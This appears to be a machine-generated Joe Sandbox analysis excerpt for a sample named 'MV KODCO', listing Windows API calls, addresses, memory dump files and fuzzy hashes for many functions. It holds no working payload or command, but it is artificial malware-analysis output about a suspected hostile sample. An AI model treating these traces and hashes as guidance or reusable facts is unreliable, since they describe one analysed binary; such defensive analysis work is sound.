                                                          • Associated: 00000000.00000002.1710165903.000000000066D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000068E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710236501.000000000069A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710252620.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5e0000_MV KODCO.jbxd
                                                          Similarity
                                                          • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
                                                          • String ID:
                                                          • API String ID: 384356119-0
                                                          • Opcode ID: d5e017027a87c5018ad803d53256558374d4b82fb585307daa6d96de3ac92c4c
                                                          • Instruction ID: baf4f194a16c0891e2964995646801ec9c14568bdedc3e72a5026f840004d743
                                                          • Opcode Fuzzy Hash: d5e017027a87c5018ad803d53256558374d4b82fb585307daa6d96de3ac92c4c
                                                          • Instruction Fuzzy Hash: 1C71C871A41B17ABD718AE68CC51B9B73AAAF01764F14412DF512DA3C1E770DD408FD4
                                                          APIs
                                                          • _memset.LIBCMT ref: 00624DF8
                                                          • GetMenuItemInfoW.USER32(006A1708,000000FF,00000000,00000030), ref: 00624E59
                                                          • SetMenuItemInfoW.USER32(006A1708,00000004,00000000,00000030), ref: 00624E8F
                                                          • Sleep.KERNEL32(000001F4), ref: 00624EA1
                                                          • GetMenuItemCount.USER32(?), ref: 00624EE5
                                                          • GetMenuItemID.USER32(?,00000000), ref: 00624F01
                                                          • GetMenuItemID.USER32(?,-00000001), ref: 00624F2B
                                                          • GetMenuItemID.USER32(?,?), ref: 00624F70
                                                          • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00624FB6
                                                          • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00624FCA
                                                          • SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00624FEB
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1710127696.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                          • Associated: 00000000.00000002.1710112810.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000066D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000068E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710236501.000000000069A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710252620.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5e0000_MV KODCO.jbxd
                                                          Similarity
                                                          • API ID: ItemMenu$Info$CheckCountRadioSleep_memset
                                                          • String ID:
                                                          • API String ID: 4176008265-0
                                                          • Opcode ID: 9ff0be7045381af1ed84f6cf24bb4e6cd74446cabdf5541b9ef003fe84451435
                                                          • Instruction ID: 8485ecfda0ee48b92f925bb76ceb990864fe8b42fb46ba62504b63869e6faaf5
                                                          • Opcode Fuzzy Hash: 9ff0be7045381af1ed84f6cf24bb4e6cd74446cabdf5541b9ef003fe84451435
                                                          • Instruction Fuzzy Hash: DD61C371A00669AFDB21CF64E9849EE7BBAFB85304F140059F842A7291EB71AD01CF21
                                                          APIs
                                                          • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00649C98
                                                          • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 00649C9B
                                                          • GetWindowLongW.USER32(?,000000F0), ref: 00649CBF
                                                          • _memset.LIBCMT ref: 00649CD0
                                                          • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00649CE2
                                                          • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00649D5A
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1710127696.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                          • Associated: 00000000.00000002.1710112810.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000066D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000068E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710236501.000000000069A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710252620.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5e0000_MV KODCO.jbxd
                                                          Similarity
                                                          • API ID: MessageSend$LongWindow_memset
                                                          • String ID:
                                                          • API String ID: 830647256-0
                                                          • Opcode ID: 78dfbb73ce51587f33e1485f44ab4302c8903562ae0fff97d052d7294d1c977c
                                                          • Instruction ID: 510afe5b72568e9a59c3269749d49fc830a6c31530191a880c67d4896c5b5368
                                                          • Opcode Fuzzy Hash: 78dfbb73ce51587f33e1485f44ab4302c8903562ae0fff97d052d7294d1c977c
                                                          • Instruction Fuzzy Hash: 12616B75940208AFDB21DFA4CC81EEEB7B9EF0A714F144159FA05EB291D770AD42DB60
                                                          APIs
                                                          • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,00000000,?), ref: 006194FE
                                                          • SafeArrayAllocData.OLEAUT32(?), ref: 00619549
                                                          • VariantInit.OLEAUT32(?), ref: 0061955B
                                                          • SafeArrayAccessData.OLEAUT32(?,?), ref: 0061957B
                                                          • VariantCopy.OLEAUT32(?,?), ref: 006195BE
                                                          • SafeArrayUnaccessData.OLEAUT32(?), ref: 006195D2
                                                          • VariantClear.OLEAUT32(?), ref: 006195E7
                                                          • SafeArrayDestroyData.OLEAUT32(?), ref: 006195F4
                                                          • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 006195FD
                                                          • VariantClear.OLEAUT32(?), ref: 0061960F
                                                          • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 0061961A
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1710127696.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                          • Associated: 00000000.00000002.1710112810.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000066D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000068E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710236501.000000000069A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710252620.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5e0000_MV KODCO.jbxd
                                                          Similarity
                                                          • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                                          • String ID:
                                                          • API String ID: 2706829360-0
                                                          • Opcode ID: 101c7c0bafa657de481bd6b876ea0741b2b4feeea8975b76e2e620fc13606a1c
                                                          • Instruction ID: 8124128fa4212d2773e17b6f8abd93a8b53b443cf7e68c4321909cab42a43f15
                                                          • Opcode Fuzzy Hash: 101c7c0bafa657de481bd6b876ea0741b2b4feeea8975b76e2e620fc13606a1c
                                                          • Instruction Fuzzy Hash: D8414171E00219AFDB01DFA4DC589EEBFBAFF48354F048065E501A3251DB74EA85CBA1
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1710127696.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                          • Associated: 00000000.00000002.1710112810.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000066D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000068E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710236501.000000000069A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710252620.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5e0000_MV KODCO.jbxd
                                                          Similarity
                                                          • API ID: Variant$ClearInit$_memset
                                                          • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop$h?i$|?i
                                                          • API String ID: 2862541840-3775816912
                                                          • Opcode ID: 94fd9124c9fcaadd3905690ee042c3273d94c70b083da49de4db8228a0597785
                                                          • Instruction ID: fe491b278af02557edad971c25693f53db48f247c8f5813b93be0f54a041754e
                                                          • Opcode Fuzzy Hash: 94fd9124c9fcaadd3905690ee042c3273d94c70b083da49de4db8228a0597785
                                                          • Instruction Fuzzy Hash: F5917E71A00219ABDF24CFA5C844FEEBBBAEF85710F109559F615AB280DB709945CFA0
                                                          APIs
                                                            • Part of subcall function 005E936C: __swprintf.LIBCMT ref: 005E93AB
                                                            • Part of subcall function 005E936C: __itow.LIBCMT ref: 005E93DF
                                                          • CoInitialize.OLE32 ref: 0063ADF6
                                                          • CoUninitialize.OLE32 ref: 0063AE01
                                                          • CoCreateInstance.OLE32(?,00000000,00000017,0066D8FC,?), ref: 0063AE61
                                                          • IIDFromString.OLE32(?,?), ref: 0063AED4
                                                          • VariantInit.OLEAUT32(?), ref: 0063AF6E
                                                          • VariantClear.OLEAUT32(?), ref: 0063AFCF
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1710127696.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                          • Associated: 00000000.00000002.1710112810.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000066D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000068E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710236501.000000000069A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710252620.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5e0000_MV KODCO.jbxd
                                                          Similarity
                                                          • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize__itow__swprintf
                                                          • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                                          • API String ID: 834269672-1287834457
                                                          • Opcode ID: 625cef9e49c3f01586f491076fba845d105ce08e0458671762503240792c4bd2
                                                          • Instruction ID: fbaea9e6d6baa6ebc3346898b082118a66e895bda5ea700ae096e62666f8301e
                                                          • Opcode Fuzzy Hash: 625cef9e49c3f01586f491076fba845d105ce08e0458671762503240792c4bd2
                                                          • Instruction Fuzzy Hash: 6C619A716087119FC710DF94C848BAABBEAAF88714F00490DF9859B2A2C770ED45EBD7
                                                          APIs
                                                          • WSAStartup.WSOCK32(00000101,?), ref: 00638168
                                                          • inet_addr.WSOCK32(?,?,?), ref: 006381AD
                                                          • gethostbyname.WSOCK32(?), ref: 006381B9
                                                          • IcmpCreateFile.IPHLPAPI ref: 006381C7
                                                          • IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 00638237
                                                          • IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 0063824D
                                                          • IcmpCloseHandle.IPHLPAPI(00000000), ref: 006382C2
                                                          • WSACleanup.WSOCK32 ref: 006382C8
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1710127696.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                          • Associated: 00000000.00000002.1710112810.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000066D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000068E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710236501.000000000069A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710252620.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5e0000_MV KODCO.jbxd
                                                          Similarity
                                                          • API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
                                                          • String ID: Ping
                                                          • API String ID: 1028309954-2246546115
                                                          • Opcode ID: 5903f2c356ee2da4aa606f48417cf4e8ea7eabeb43d56c17bae3fc4e936844e6
                                                          • Instruction ID: 052cbe49469db97dd312fed3067c8ebc51243d4fb7a5b977d996faf63fa4a096
                                                          • Opcode Fuzzy Hash: 5903f2c356ee2da4aa606f48417cf4e8ea7eabeb43d56c17bae3fc4e936844e6
                                                          • Instruction Fuzzy Hash: E25180316047019FDB209F24DD49BAABBE6FF48310F044859FA95D73A1DB70E901CB81
                                                          APIs
                                                          • _memset.LIBCMT ref: 00649E5B
                                                          • CreateMenu.USER32 ref: 00649E76
                                                          • SetMenu.USER32(?,00000000), ref: 00649E85
                                                          • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00649F12
                                                          • IsMenu.USER32(?), ref: 00649F28
                                                          • CreatePopupMenu.USER32 ref: 00649F32
                                                          • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00649F63
                                                          • DrawMenuBar.USER32 ref: 00649F71
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1710127696.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                          • Associated: 00000000.00000002.1710112810.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000066D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000068E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710236501.000000000069A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710252620.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5e0000_MV KODCO.jbxd
                                                          Similarity
                                                          • API ID: Menu$CreateItem$DrawInfoInsertPopup_memset
                                                          • String ID: 0
                                                          • API String ID: 176399719-4108050209
                                                          • Opcode ID: d0a3307f0b4d29825257a6ffa4c25b01d2648005831672ffef442aacf8f2b814
                                                          • Instruction ID: 57557883b0f1eaeb4427d5501865f70d1ed358d06691bfeed99a3287cbc2761c
                                                          • Opcode Fuzzy Hash: d0a3307f0b4d29825257a6ffa4c25b01d2648005831672ffef442aacf8f2b814
                                                          • Instruction Fuzzy Hash: 714135B8A00209AFDB50DFA5D844FEABBB6FF89314F144129F946A7360D770A914CF60
                                                          APIs
                                                          • SetErrorMode.KERNEL32(00000001), ref: 0062E396
                                                          • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 0062E40C
                                                          • GetLastError.KERNEL32 ref: 0062E416
                                                          • SetErrorMode.KERNEL32(00000000,READY), ref: 0062E483
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1710127696.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                          • Associated: 00000000.00000002.1710112810.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000066D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000068E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710236501.000000000069A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710252620.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5e0000_MV KODCO.jbxd
                                                          Similarity
                                                          • API ID: Error$Mode$DiskFreeLastSpace
                                                          • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                                                          • API String ID: 4194297153-14809454
                                                          • Opcode ID: 44e83ea37783a23ed89f653ca0490e4858b27c3e862a8b5a933c0c3d44cc0b63
                                                          • Instruction ID: bb3fb62dcc52ebe02a32dba9f43a5fb5f9b24c30fc499dd6917425cbc4f632a7
                                                          • Opcode Fuzzy Hash: 44e83ea37783a23ed89f653ca0490e4858b27c3e862a8b5a933c0c3d44cc0b63
                                                          • Instruction Fuzzy Hash: 9631A535A006169FCB05EF54E945AEDBBFAFF58304F148026E505EB391D6719A02CB51
                                                          APIs
                                                          • SendMessageW.USER32(?,0000018C,000000FF,00000002), ref: 0061B98C
                                                          • GetDlgCtrlID.USER32 ref: 0061B997
                                                          • GetParent.USER32 ref: 0061B9B3
                                                          • SendMessageW.USER32(00000000,?,00000111,?), ref: 0061B9B6
                                                          • GetDlgCtrlID.USER32(?), ref: 0061B9BF
                                                          • GetParent.USER32(?), ref: 0061B9DB
                                                          • SendMessageW.USER32(00000000,?,?,00000111), ref: 0061B9DE
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1710127696.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                          • Associated: 00000000.00000002.1710112810.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000066D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000068E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710236501.000000000069A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710252620.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5e0000_MV KODCO.jbxd
                                                          Similarity
                                                          • API ID: MessageSend$CtrlParent
                                                          • String ID: ComboBox$ListBox
                                                          • API String ID: 1383977212-1403004172
                                                          • Opcode ID: 7353411ad16c0dd707b277371ac3f517e29bfca48251b1c961af17f5c285637b
                                                          • Instruction ID: 893bfc126897bf81b20db8d957c9b4c6632744851334edf149d234b18d40d3ce
                                                          • Opcode Fuzzy Hash: 7353411ad16c0dd707b277371ac3f517e29bfca48251b1c961af17f5c285637b
                                                          • Instruction Fuzzy Hash: 9D21C174A00104BFCF04ABA5CC86EFEBB7AEB4A300F144119F651972E1DBB598569B20
                                                          APIs
                                                          • SendMessageW.USER32(?,00000186,00000002,00000000), ref: 0061BA73
                                                          • GetDlgCtrlID.USER32 ref: 0061BA7E
                                                          • GetParent.USER32 ref: 0061BA9A
                                                          • SendMessageW.USER32(00000000,?,00000111,?), ref: 0061BA9D
                                                          • GetDlgCtrlID.USER32(?), ref: 0061BAA6
                                                          • GetParent.USER32(?), ref: 0061BAC2
                                                          • SendMessageW.USER32(00000000,?,?,00000111), ref: 0061BAC5
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1710127696.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                          • Associated: 00000000.00000002.1710112810.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000066D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000068E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710236501.000000000069A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710252620.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5e0000_MV KODCO.jbxd
                                                          Similarity
                                                          • API ID: MessageSend$CtrlParent
                                                          • String ID: ComboBox$ListBox
                                                          • API String ID: 1383977212-1403004172
                                                          • Opcode ID: 23479d59420fa5c474a12957063b38e9c5d492e84ce1f8070cf6ad95e0b28fa1
                                                          • Instruction ID: a57f3fdd61db2e12a91ad9ab26636183c6a86e766f1afffc4e579b07d3f77c0c
                                                          • Opcode Fuzzy Hash: 23479d59420fa5c474a12957063b38e9c5d492e84ce1f8070cf6ad95e0b28fa1
                                                          • Instruction Fuzzy Hash: A121F2B4A00248BFDF05EBA5CC85EFEBB7AEF45300F044019F551A72A1DBB5985ADB20
                                                          APIs
                                                          • GetParent.USER32 ref: 0061BAE3
                                                          • GetClassNameW.USER32(00000000,?,00000100), ref: 0061BAF8
                                                          • _wcscmp.LIBCMT ref: 0061BB0A
                                                          • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 0061BB85
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1710127696.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                          • Associated: 00000000.00000002.1710112810.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000066D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000068E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710236501.000000000069A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710252620.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5e0000_MV KODCO.jbxd
                                                          Similarity
                                                          • API ID: ClassMessageNameParentSend_wcscmp
                                                          • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                                                          • API String ID: 1704125052-3381328864
                                                          • Opcode ID: ff3ecae3372bf4b14b7fb8df7cba225afa003918f302cfbb1b31e67f891c7466
                                                          • Instruction ID: 5d721d927b101c7215bcd08fe444e69791d35f8123cab3630813ec1480f72b89
                                                          • Opcode Fuzzy Hash: ff3ecae3372bf4b14b7fb8df7cba225afa003918f302cfbb1b31e67f891c7466
                                                          • Instruction Fuzzy Hash: 5C1106B764C307FAFA247621DC16DE7379F9B22720F201026F904E58E5FFA168915518
                                                          APIs
                                                          • VariantInit.OLEAUT32(?), ref: 0063B2D5
                                                          • CoInitialize.OLE32(00000000), ref: 0063B302
                                                          • CoUninitialize.OLE32 ref: 0063B30C
                                                          • GetRunningObjectTable.OLE32(00000000,?), ref: 0063B40C
                                                          • SetErrorMode.KERNEL32(00000001,00000029), ref: 0063B539
                                                          • CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002), ref: 0063B56D
                                                          • CoGetObject.OLE32(?,00000000,0066D91C,?), ref: 0063B590
                                                          • SetErrorMode.KERNEL32(00000000), ref: 0063B5A3
                                                          • SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 0063B623
                                                          • VariantClear.OLEAUT32(0066D91C), ref: 0063B633
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1710127696.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                          • Associated: 00000000.00000002.1710112810.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000066D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000068E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710236501.000000000069A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710252620.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5e0000_MV KODCO.jbxd
                                                          Similarity
                                                          • API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize
                                                          • String ID:
                                                          • API String ID: 2395222682-0
                                                          • Opcode ID: e34a2c4d875fbb52e3ca05892b4155a9e339a4e0302d7415ab9e8b214947582d
                                                          • Instruction ID: a5ba20d0cb076a21ed0d13cbb3bc0444dc8bf3544660f6bccc277492c4a3a10c
                                                          • Opcode Fuzzy Hash: e34a2c4d875fbb52e3ca05892b4155a9e339a4e0302d7415ab9e8b214947582d
                                                          • Instruction Fuzzy Hash: A6C12471608305AFD700DF65C88496BBBEAFF88304F04591DF68A9B251DB71ED06CB92
                                                          APIs
                                                          • GetCurrentThreadId.KERNEL32 ref: 00624047
                                                          • GetForegroundWindow.USER32(00000000,?,?,?,?,?,006230A5,?,00000001), ref: 0062405B
                                                          • GetWindowThreadProcessId.USER32(00000000), ref: 00624062
                                                          • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,006230A5,?,00000001), ref: 00624071
                                                          • GetWindowThreadProcessId.USER32(?,00000000), ref: 00624083
                                                          • AttachThreadInput.USER32(?,00000000,00000001,?,?,?,?,?,006230A5,?,00000001), ref: 0062409C
                                                          • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,006230A5,?,00000001), ref: 006240AE
                                                          • AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,006230A5,?,00000001), ref: 006240F3
                                                          • AttachThreadInput.USER32(?,?,00000000,?,?,?,?,?,006230A5,?,00000001), ref: 00624108
                                                          • AttachThreadInput.USER32(00000000,?,00000000,?,?,?,?,?,006230A5,?,00000001), ref: 00624113
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1710127696.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                          • Associated: 00000000.00000002.1710112810.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000066D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000068E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710236501.000000000069A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710252620.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5e0000_MV KODCO.jbxd
                                                          Similarity
                                                          • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                                                          • String ID:
                                                          • API String ID: 2156557900-0
                                                          • Opcode ID: 052ae212dcb963e180dcc5a19f9b476055adaa648993814f442e091f91572439
                                                          • Instruction ID: 6c60e78453d4a40af4162e00c573fb68498fca2131fbc1b2d7fa8a4a46da8627
                                                          • Opcode Fuzzy Hash: 052ae212dcb963e180dcc5a19f9b476055adaa648993814f442e091f91572439
                                                          • Instruction Fuzzy Hash: E2319371A00624BFDB10EF54EC8ABB977ABAB65321F109015F906D6390CFB4AD808F60
                                                          APIs
                                                          • GetSysColor.USER32(00000008), ref: 005FB496
                                                          • SetTextColor.GDI32(?,000000FF), ref: 005FB4A0
                                                          • SetBkMode.GDI32(?,00000001), ref: 005FB4B5
                                                          • GetStockObject.GDI32(00000005), ref: 005FB4BD
                                                          • GetClientRect.USER32(?), ref: 0065DD63
                                                          • SendMessageW.USER32(?,00001328,00000000,?), ref: 0065DD7A
                                                          • GetWindowDC.USER32(?), ref: 0065DD86
                                                          • GetPixel.GDI32(00000000,?,?), ref: 0065DD95
                                                          • ReleaseDC.USER32(?,00000000), ref: 0065DDA7
                                                          • GetSysColor.USER32(00000005), ref: 0065DDC5
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1710127696.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                          • Associated: 00000000.00000002.1710112810.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000066D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000068E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710236501.000000000069A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710252620.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5e0000_MV KODCO.jbxd
                                                          Similarity
                                                          • API ID: Color$ClientMessageModeObjectPixelRectReleaseSendStockTextWindow
                                                          • String ID:
                                                          • API String ID: 3430376129-0
                                                          • Opcode ID: 44efe99aa72b2f2e3f20d1a7573888e601b4968caad7a15cc6bb09b8ecc98404
                                                          • Instruction ID: cfe7ba8ecc0c35690933b0ee04d66c8a06083fbe57c7ccb64895397af90b4c77
                                                          • Opcode Fuzzy Hash: 44efe99aa72b2f2e3f20d1a7573888e601b4968caad7a15cc6bb09b8ecc98404
                                                          • Instruction Fuzzy Hash: 60114C31A00205EFEB216BA4EC0DBE97F73FB09365F109625FA66951E1CBB24941DF21
                                                          APIs
